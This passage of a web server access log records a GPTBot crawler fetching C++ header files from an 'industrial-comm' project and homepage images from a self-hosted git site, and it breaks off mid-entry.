"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12705] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10525] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13027] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12897] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13028] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11821] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12510] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11897] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11432] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12015] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10246] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11522] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10244] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10524] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12833] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12703] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11317] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" -[17/Feb/2026:15:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 